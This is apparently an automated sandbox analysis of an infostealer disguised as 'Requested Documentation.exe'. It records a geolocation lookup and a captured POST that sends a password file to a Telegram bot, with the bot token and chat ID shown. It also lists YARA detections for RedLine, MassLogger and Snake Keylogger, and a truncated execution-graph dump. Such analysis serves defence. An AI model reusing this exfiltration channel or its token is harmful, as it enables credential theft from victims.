                                                                            2024-12-30 09:57:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-12-30 09:57:05 UTC852INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Dec 2024 09:57:05 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 867414
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eE4y1TfofWorFppVSIJPPgjhx0rtVkPUEIGYUltTnAx2QuvocIj0zhQOPZoRwleMHYL4sqNYBhvqX18Ao9%2F3fkfa35CexFkHwkYgVDE%2FgXGnYlL3F1s1MWjvucCqsy9u7oo8mzu4"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fa129e36ca49e02-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1976&rtt_var=751&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1447694&cwnd=244&unsent_bytes=0&cid=0f57581887fc53ad&ts=209&x=0"
                                                                            2024-12-30 09:57:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449732149.154.167.2204436344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-30 09:57:11 UTC295OUTPOST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary================8dd288e6a54ccbb
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1090
                                                                            Connection: Keep-Alive
                                                                            2024-12-30 09:57:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 38 38 65 36 61 35 34 63 63 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: --===============8dd288e6a54ccbbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                            2024-12-30 09:57:11 UTC388INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Mon, 30 Dec 2024 09:57:11 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 556
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2024-12-30 09:57:11 UTC556INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 31 37 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 30 38 36 36 32 37 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 6e 6f 76 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 39 38 32 39 34 37 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6b 77 61 6e 64 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 67 34 6d 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 35 35 32 36 33 31 2c 22 64 6f 63 75
                                                                            Data Ascii: {"ok":true,"result":{"message_id":51750,"from":{"id":7708662779,"is_bot":true,"first_name":"NOVA","username":"Skullsnovabot"},"chat":{"id":5839829477,"first_name":"Makwanda","last_name":"Skulls","username":"Big4m","type":"private"},"date":1735552631,"docu


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:04:57:00
                                                                            Start date:30/12/2024
                                                                            Path:C:\Users\user\Desktop\Requested Documentation.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Requested Documentation.exe"
                                                                            Imagebase:0x980000
                                                                            File size:1'090'048 bytes
                                                                            MD5 hash:7CCC5D635CBD8627F4F2AAC3E54248D0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:04:57:01
                                                                            Start date:30/12/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Requested Documentation.exe"
                                                                            Imagebase:0xc10000
                                                                            File size:45'984 bytes
                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.4192706984.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4194140589.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:3.7%
                                                                              Dynamic/Decrypted Code Coverage:1.3%
                                                                              Signature Coverage:2.9%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:53
                                                                              execution_graph 103699 13023b0 103713 1300000 103699->103713 103701 130245b 103716 13022a0 103701->103716 103719 1303480 GetPEB 103713->103719 103715 130068b 103715->103701 103717 13022a9 Sleep 103716->103717 103718 13022b7 103717->103718 103720 13034aa 103719->103720 103720->103715 103721 98552a 103728 985ab8 103721->103728 103727 98555a Mailbox 103747 9a0db6 103728->103747 103730 985acb 103731 9a0db6 Mailbox 59 API calls 103730->103731 103732 98553c 103731->103732 103733 9854d2 103732->103733 103785 9858cf 103733->103785 103736 985514 103736->103727 103739 988061 MultiByteToWideChar 103736->103739 103738 9854e3 103738->103736 103792 985bc0 103738->103792 103798 985a7a 59 API calls 2 library calls 103738->103798 103740 9880ce 103739->103740 103741 988087 103739->103741 103813 987d8c 103740->103813 103743 9a0db6 Mailbox 59 API calls 103741->103743 103744 98809c MultiByteToWideChar 103743->103744 103801 98774d 103744->103801 103746 9880c0 103746->103727 103750 9a0dbe 103747->103750 103749 9a0dd8 103749->103730 103750->103749 103752 9a0ddc std::exception::exception 103750->103752 103757 9a571c 103750->103757 103774 9a33a1 DecodePointer 103750->103774 103775 9a859b RaiseException 103752->103775 103754 9a0e06 103776 9a84d1 58 API calls _free 103754->103776 103756 9a0e18 103756->103730 103758 9a5797 103757->103758 103762 9a5728 103757->103762 103783 9a33a1 DecodePointer 103758->103783 103760 9a579d 103784 9a8b28 58 API calls __getptd_noexit 103760->103784 103764 9a5733 103762->103764 103765 9a575b RtlAllocateHeap 103762->103765 103768 9a5783 103762->103768 103772 9a5781 103762->103772 103780 9a33a1 DecodePointer 103762->103780 103764->103762 103777 9aa16b 58 API calls __NMSG_WRITE 103764->103777 103778 9aa1c8 58 API calls 6 library calls 103764->103778 103779 9a309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103764->103779 103765->103762 103766 9a578f 103765->103766 103766->103750 103781 9a8b28 58 API calls __getptd_noexit 103768->103781 103782 9a8b28 58 API calls __getptd_noexit 103772->103782 103774->103750 103775->103754 103776->103756 103777->103764 103778->103764 103780->103762 103781->103772 103782->103766 103783->103760 103784->103766 103786 9bdc3c 103785->103786 103787 9858e0 103785->103787 103799 9d5ecd 59 API calls Mailbox 103786->103799 103787->103738 103789 9bdc46 103790 9a0db6 Mailbox 59 API calls 103789->103790 103791 9bdc52 103790->103791 103793 985c33 103792->103793 103795 985bce 103792->103795 103800 985c4e SetFilePointerEx 103793->103800 103794 985bf6 103794->103738 103795->103794 103797 985c06 ReadFile 103795->103797 103797->103794 103797->103795 103798->103738 103799->103789 103800->103795 103802 98775c 103801->103802 103803 9877cf 103801->103803 103802->103803 103805 987768 103802->103805 103824 987d2c 103803->103824 103806 9877a0 103805->103806 103807 987772 103805->103807 103821 988029 103806->103821 103817 987f27 103807->103817 103810 9877aa 103811 9a0db6 Mailbox 59 API calls 103810->103811 103812 98777a _memmove 103811->103812 103812->103746 103814 987da6 103813->103814 103816 987d99 103813->103816 103815 9a0db6 Mailbox 59 API calls 103814->103815 103815->103816 103816->103746 103818 987f39 103817->103818 103819 987f3f 103817->103819 103818->103812 103820 9a0db6 Mailbox 59 API calls 103819->103820 103820->103818 103822 9a0db6 Mailbox 59 API calls 103821->103822 103823 988033 103822->103823 103823->103810 103825 987d3a 103824->103825 103826 987d43 _memmove 103824->103826 103825->103826 103828 987e4f 103825->103828 103826->103812 103829 987e5f _memmove 103828->103829 103830 987e62 103828->103830 103829->103826 103831 9a0db6 Mailbox 59 API calls 103830->103831 103831->103829 103832 98e5ab 103835 98d100 103832->103835 103834 98e5b9 103836 98d11d 103835->103836 103865 98d37d 103835->103865 103837 9c26e0 103836->103837 103838 9c2691 103836->103838 103855 98d144 103836->103855 103910 9fa3e6 341 API calls __cinit 103837->103910 103841 9c2694 103838->103841 103848 9c26af 103838->103848 103842 9c26a0 103841->103842 103841->103855 103908 9fa9fa 341 API calls 103842->103908 103846 9c28b5 103846->103846 103847 98d54b 103847->103834 103848->103865 103909 9faea2 341 API calls 3 library calls 103848->103909 103849 98d434 103899 988a52 68 API calls 103849->103899 103853 98d443 103853->103834 103854 9c27fc 103918 9fa751 89 API calls 103854->103918 103855->103847 103855->103849 103855->103854 103855->103865 103869 989ea0 103855->103869 103893 988740 68 API calls __cinit 103855->103893 103894 988542 68 API calls 103855->103894 103895 9884c0 103855->103895 103900 98843a 68 API calls 103855->103900 103901 98cf7c 341 API calls 103855->103901 103902 989dda 59 API calls Mailbox 103855->103902 103903 9a2d40 103855->103903 103906 98cf00 89 API calls 103855->103906 103907 98cd7d 341 API calls 103855->103907 103911 988a52 68 API calls 103855->103911 103912 989d3c 60 API calls Mailbox 103855->103912 103913 9d678d 60 API calls 103855->103913 103914 988047 103855->103914 103865->103847 103919 9e9e4a 89 API calls 4 library calls 103865->103919 103870 989ebf 103869->103870 103886 989eed Mailbox 103869->103886 103871 9a0db6 Mailbox 59 API calls 103870->103871 103871->103886 103872 98b475 103873 988047 59 API calls 103872->103873 103888 98a057 103873->103888 103874 98b47a 103876 9c0055 103874->103876 103892 9c09e5 103874->103892 103875 9a0db6 59 API calls Mailbox 103875->103886 103922 9e9e4a 89 API calls 4 library calls 103876->103922 103880 9c0064 103880->103855 103882 988047 59 API calls 103882->103886 103883 987667 59 API calls 103883->103886 103885 9d6e8f 59 API calls 103885->103886 103886->103872 103886->103874 103886->103875 103886->103876 103886->103882 103886->103883 103886->103885 103887 9a2d40 67 API calls __cinit 103886->103887 103886->103888 103889 9c09d6 103886->103889 103891 98a55a 103886->103891 103920 98c8c0 341 API calls 2 library calls 103886->103920 103921 98b900 60 API calls Mailbox 103886->103921 103887->103886 103888->103855 103924 9e9e4a 89 API calls 4 library calls 103889->103924 103923 9e9e4a 89 API calls 4 library calls 103891->103923 103925 9e9e4a 89 API calls 4 library calls 103892->103925 103893->103855 103894->103855 103896 9884cb 103895->103896 103898 9884f2 103896->103898 103926 9889b3 69 API calls Mailbox 103896->103926 103898->103855 103899->103853 103900->103855 103901->103855 103902->103855 103927 9a2c44 103903->103927 103905 9a2d4b 103905->103855 103906->103855 103907->103855 103908->103847 103909->103865 103910->103855 103911->103855 103912->103855 103913->103855 103915 98805a 103914->103915 103916 988052 103914->103916 103915->103855 104005 987f77 59 API calls 2 library calls 103916->104005 103918->103865 103919->103846 103920->103886 103921->103886 103922->103880 103923->103888 103924->103892 103925->103888 103926->103898 103928 9a2c50 _fprintf 103927->103928 103935 9a3217 103928->103935 103934 9a2c77 _fprintf 103934->103905 103952 9a9c0b 103935->103952 103937 9a2c59 103938 9a2c88 DecodePointer DecodePointer 103937->103938 103939 9a2c65 103938->103939 103940 9a2cb5 103938->103940 103949 9a2c82 103939->103949 103940->103939 103998 9a87a4 59 API calls _fprintf 103940->103998 103942 9a2d18 EncodePointer EncodePointer 103942->103939 103943 9a2cec 103943->103939 103947 9a2d06 EncodePointer 103943->103947 104000 9a8864 61 API calls 2 library calls 103943->104000 103944 9a2cc7 103944->103942 103944->103943 103999 9a8864 61 API calls 2 library calls 103944->103999 103947->103942 103948 9a2d00 103948->103939 103948->103947 104001 9a3220 103949->104001 103953 9a9c2f EnterCriticalSection 103952->103953 103954 9a9c1c 103952->103954 103953->103937 103959 9a9c93 103954->103959 103956 9a9c22 103956->103953 103983 9a30b5 58 API calls 3 library calls 103956->103983 103960 9a9c9f _fprintf 103959->103960 103961 9a9ca8 103960->103961 103962 9a9cc0 103960->103962 103984 9aa16b 58 API calls __NMSG_WRITE 103961->103984 103971 9a9ce1 _fprintf 103962->103971 103987 9a881d 58 API calls 2 library calls 103962->103987 103964 9a9cad 103985 9aa1c8 58 API calls 6 library calls 103964->103985 103967 9a9cd5 103969 9a9ceb 103967->103969 103970 9a9cdc 103967->103970 103968 9a9cb4 103986 9a309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103968->103986 103972 9a9c0b __lock 58 API calls 103969->103972 103988 9a8b28 58 API calls __getptd_noexit 103970->103988 103971->103956 103975 9a9cf2 103972->103975 103977 9a9cff 103975->103977 103978 9a9d17 103975->103978 103989 9a9e2b InitializeCriticalSectionAndSpinCount 103977->103989 103990 9a2d55 103978->103990 103981 9a9d0b 103996 9a9d33 LeaveCriticalSection _doexit 103981->103996 103984->103964 103985->103968 103987->103967 103988->103971 103989->103981 103991 9a2d5e RtlFreeHeap 103990->103991 103995 9a2d87 _free 103990->103995 103992 9a2d73 103991->103992 103991->103995 103997 9a8b28 58 API calls __getptd_noexit 103992->103997 103994 9a2d79 GetLastError 103994->103995 103995->103981 103996->103971 103997->103994 103998->103944 103999->103943 104000->103948 104004 9a9d75 LeaveCriticalSection 104001->104004 104003 9a2c87 104003->103934 104004->104003 104005->103915 104006 98107d 104011 98708b 104006->104011 104008 98108c 104009 9a2d40 __cinit 67 API calls 104008->104009 104010 981096 104009->104010 104012 98709b __write_nolock 104011->104012 104042 987667 104012->104042 104016 98715a 104054 9a050b 104016->104054 104023 987667 59 API calls 104024 98718b 104023->104024 104025 987d8c 59 API calls 104024->104025 104026 987194 RegOpenKeyExW 104025->104026 104027 9be8b1 RegQueryValueExW 104026->104027 104032 9871b6 Mailbox 104026->104032 104028 9be8ce 104027->104028 104029 9be943 RegCloseKey 104027->104029 104030 9a0db6 Mailbox 59 API calls 104028->104030 104029->104032 104041 9be955 _wcscat Mailbox __wsetenvp 104029->104041 104031 9be8e7 104030->104031 104073 98522e 104031->104073 104032->104008 104035 9be90f 104076 987bcc 104035->104076 104037 9879f2 59 API calls 104037->104041 104038 9be929 104038->104029 104040 983f74 59 API calls 104040->104041 104041->104032 104041->104037 104041->104040 104085 987de1 104041->104085 104043 9a0db6 Mailbox 59 API calls 104042->104043 104044 987688 104043->104044 104045 9a0db6 Mailbox 59 API calls 104044->104045 104046 987151 104045->104046 104047 984706 104046->104047 104089 9b1940 104047->104089 104050 987de1 59 API calls 104051 984739 104050->104051 104091 984750 104051->104091 104053 984743 Mailbox 104053->104016 104055 9b1940 __write_nolock 104054->104055 104056 9a0518 GetFullPathNameW 104055->104056 104057 9a053a 104056->104057 104058 987bcc 59 API calls 104057->104058 104059 987165 104058->104059 104060 987cab 104059->104060 104061 9bed4a 104060->104061 104062 987cbf 104060->104062 104063 988029 59 API calls 104061->104063 104105 987c50 104062->104105 104066 9bed55 __wsetenvp _memmove 104063->104066 104065 987173 104067 983f74 104065->104067 104068 983f82 104067->104068 104072 983fa4 _memmove 104067->104072 104070 9a0db6 Mailbox 59 API calls 104068->104070 104069 9a0db6 Mailbox 59 API calls 104071 983fb8 104069->104071 104070->104072 104071->104023 104072->104069 104074 9a0db6 Mailbox 59 API calls 104073->104074 104075 985240 RegQueryValueExW 104074->104075 104075->104035 104075->104038 104077 987bd8 __wsetenvp 104076->104077 104078 987c45 104076->104078 104080 987bee 104077->104080 104081 987c13 104077->104081 104079 987d2c 59 API calls 104078->104079 104084 987bf6 _memmove 104079->104084 104082 987f27 59 API calls 104080->104082 104083 988029 59 API calls 104081->104083 104082->104084 104083->104084 104084->104038 104086 987df0 __wsetenvp _memmove 104085->104086 104087 9a0db6 Mailbox 59 API calls 104086->104087 104088 987e2e 104087->104088 104088->104041 104090 984713 GetModuleFileNameW 104089->104090 104090->104050 104092 9b1940 __write_nolock 104091->104092 104093 98475d GetFullPathNameW 104092->104093 104094 984799 104093->104094 104095 98477c 104093->104095 104097 987d8c 59 API calls 104094->104097 104096 987bcc 59 API calls 104095->104096 104098 984788 104096->104098 104097->104098 104101 987726 104098->104101 104102 987734 104101->104102 104103 987d2c 59 API calls 104102->104103 104104 984794 104103->104104 104104->104053 104106 987c5f __wsetenvp 104105->104106 104107 987c70 _memmove 104106->104107 104108 988029 59 API calls 104106->104108 104107->104065 104109 9bed07 _memmove 104108->104109 104110 9bfdfc 104147 98ab30 Mailbox _memmove 104110->104147 104112 9d617e Mailbox 59 API calls 104134 98a057 104112->104134 104114 9a0db6 59 API calls Mailbox 104114->104147 104116 98b525 104397 9e9e4a 89 API calls 4 library calls 104116->104397 104118 9c0055 104396 9e9e4a 89 API calls 4 library calls 104118->104396 104119 9a0db6 59 API calls Mailbox 104135 989f37 Mailbox 104119->104135 104121 98b475 104125 988047 59 API calls 104121->104125 104124 9c0064 104125->104134 104127 98b47a 104127->104118 104139 9c09e5 104127->104139 104129 988047 59 API calls 104129->104135 104131 987667 59 API calls 104131->104135 104132 9d6e8f 59 API calls 104132->104135 104133 987de1 59 API calls 104133->104147 104135->104118 104135->104119 104135->104121 104135->104127 104135->104129 104135->104131 104135->104132 104135->104134 104136 9c09d6 104135->104136 104137 9a2d40 67 API calls __cinit 104135->104137 104140 98a55a 104135->104140 104389 98c8c0 341 API calls 2 library calls 104135->104389 104390 98b900 60 API calls Mailbox 104135->104390 104401 9e9e4a 89 API calls 4 library calls 104136->104401 104137->104135 104402 9e9e4a 89 API calls 4 library calls 104139->104402 104400 9e9e4a 89 API calls 4 library calls 104140->104400 104143 98b2b6 104394 98f6a3 341 API calls 104143->104394 104145 989ea0 341 API calls 104145->104147 104146 9c086a 104398 989c90 59 API calls Mailbox 104146->104398 104147->104114 104147->104116 104147->104133 104147->104134 104147->104135 104147->104143 104147->104145 104147->104146 104149 9c0878 104147->104149 104151 9c085c 104147->104151 104152 98b21c 104147->104152 104156 9d6e8f 59 API calls 104147->104156 104162 9fdf23 104147->104162 104165 991fc3 104147->104165 104205 9ed07a 104147->104205 104252 9f445a 104147->104252 104261 9ed07b 104147->104261 104308 9fc2e0 104147->104308 104340 9e7956 104147->104340 104346 9fbc6b 104147->104346 104386 9d617e 104147->104386 104391 989c90 59 API calls Mailbox 104147->104391 104395 9fc193 85 API calls 2 library calls 104147->104395 104399 9e9e4a 89 API calls 4 library calls 104149->104399 104151->104112 104151->104134 104392 989d3c 60 API calls Mailbox 104152->104392 104154 98b22d 104393 989d3c 60 API calls Mailbox 104154->104393 104156->104147 104403 9fcadd 104162->104403 104164 9fdf33 104164->104147 104547 989a98 104165->104547 104169 9a0db6 Mailbox 59 API calls 104170 991ff4 104169->104170 104173 992004 104170->104173 104580 9857a6 60 API calls Mailbox 104170->104580 104171 992029 104181 992036 104171->104181 104602 989b3c 59 API calls 104171->104602 104172 9c6585 104172->104171 104601 9ef574 59 API calls 104172->104601 104175 989837 84 API calls 104173->104175 104177 992012 104175->104177 104581 9857f6 104177->104581 104178 9c65cd 104180 9c65d5 104178->104180 104178->104181 104603 989b3c 59 API calls 104180->104603 104560 985cdf 104181->104560 104186 99203d 104187 9c65e7 104186->104187 104188 992057 104186->104188 104190 9a0db6 Mailbox 59 API calls 104187->104190 104189 987667 59 API calls 104188->104189 104191 99205f 104189->104191 104192 9c65ed 104190->104192 104565 985572 104191->104565 104193 9c6601 104192->104193 104604 985850 ReadFile SetFilePointerEx 104192->104604 104199 9c6605 _memmove 104193->104199 104605 9e76c4 59 API calls 2 library calls 104193->104605 104197 99206e 104197->104199 104594 989a3c 59 API calls Mailbox 104197->104594 104200 992082 Mailbox 104201 9920bc 104200->104201 104595 985c6f 104200->104595 104201->104147 104206 9ed09a 104205->104206 104207 9ed0a5 104205->104207 104646 989b3c 59 API calls 104206->104646 104210 987667 59 API calls 104207->104210 104250 9ed17f Mailbox 104207->104250 104209 9a0db6 Mailbox 59 API calls 104211 9ed1c8 104209->104211 104212 9ed0c9 104210->104212 104213 9ed1d4 104211->104213 104712 9857a6 60 API calls Mailbox 104211->104712 104215 987667 59 API calls 104212->104215 104216 989837 84 API calls 104213->104216 104217 9ed0d2 104215->104217 104218 9ed1ec 104216->104218 104219 989837 84 API calls 104217->104219 104220 9857f6 67 API calls 104218->104220 104221 9ed0de 104219->104221 104222 9ed1fb 104220->104222 104647 98459b 104221->104647 104224 9ed1ff GetLastError 104222->104224 104225 9ed233 104222->104225 104227 9ed218 104224->104227 104230 